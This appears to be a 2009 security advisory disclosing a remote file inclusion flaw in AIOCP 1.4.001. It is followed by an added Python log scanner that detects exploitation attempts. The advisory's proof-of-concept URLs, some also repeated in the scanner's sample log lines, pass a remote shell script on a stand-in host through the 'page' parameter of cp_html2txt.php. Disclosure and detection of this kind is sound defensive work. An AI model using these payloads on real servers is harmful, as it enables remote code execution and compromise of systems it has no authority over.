Remote File Inclusion in aiocp

2009-07-27T00:00:00
ID SECURITYVULNS:DOC:22219
Type securityvulns
Reporter Securityvulns
Modified 2009-07-27T00:00:00

Description

Aiocp 1.4.001 Remote File Inclusion vulnerability

Found by : Hadi Kiamarsi

Contact : hadikiamarsi [at] hotmail.com

Download :

http://sourceforge.net/projects/aiocp/files/aiocp/AIOCP%201.4.001/aiocp_1_4_001.zip/download

PoC :

http://[target]/[path]/public/code/cp_html2txt.php?page=[SHELL]

Example :

http://localhost/root/public/code/cp_html2txt.php?page=http://www.example.com/shell.php

Local example :

http://localhost/root/public/code/cp_html2txt.php?page=http://localhost/shell.php
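
Detection example (added here; not part of the original advisory and not AIOCP code): a log check that flags requests to cp_html2txt.php whose page parameter decodes to a remote URL, as in the PoC above. It goes beyond the advisory's http:// case by matching any scheme:// or //host value and by undoing repeated percent-encoding. The combined access-log format, the function names and the sample entries are assumptions made for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script path and parameter taken from the advisory's PoC URL.
VULN_SCRIPT = "/public/code/cp_html2txt.php"
VULN_PARAM = "page"
# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# Value that starts with scheme:// (http, https, ftp, ...) or a bare //host.
REMOTE_RE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)

# Constructed sample entries: addresses, times and the value "about" are made up.
SAMPLE_LOG = [
    '198.51.100.7 - - [27/Jul/2009:10:00:01 +0000] "GET /root/public/code/cp_html2txt.php?page=http://www.example.com/shell.php HTTP/1.1" 200 512 "-" "-"',
    '198.51.100.7 - - [27/Jul/2009:10:00:02 +0000] "GET /root/public/code/cp_html2txt.php?page=http%253A%252F%252Fwww.example.com%252Fshell.php HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.10 - - [27/Jul/2009:10:00:03 +0000] "GET /root/public/code/cp_html2txt.php?page=about HTTP/1.1" 200 2048 "-" "-"',
    '192.0.2.10 - - [27/Jul/2009:10:00:04 +0000] "GET /root/index.php?page=http://www.example.com/ HTTP/1.1" 200 100 "-" "-"',
]

def fully_unquote(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_line(line):
    """Return the decoded remote `page` value if the entry matches, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not fully_unquote(parts.path).lower().endswith(VULN_SCRIPT):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get(VULN_PARAM, []):
        value = fully_unquote(value)  # parse_qs already removed one layer
        if REMOTE_RE.match(value):
            return value
    return None

def scan(lines):
    """Return (line number, decoded page value) for every flagged entry."""
    return [(n, v) for n, line in enumerate(lines, start=1)
            if (v := check_line(line)) is not None]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```
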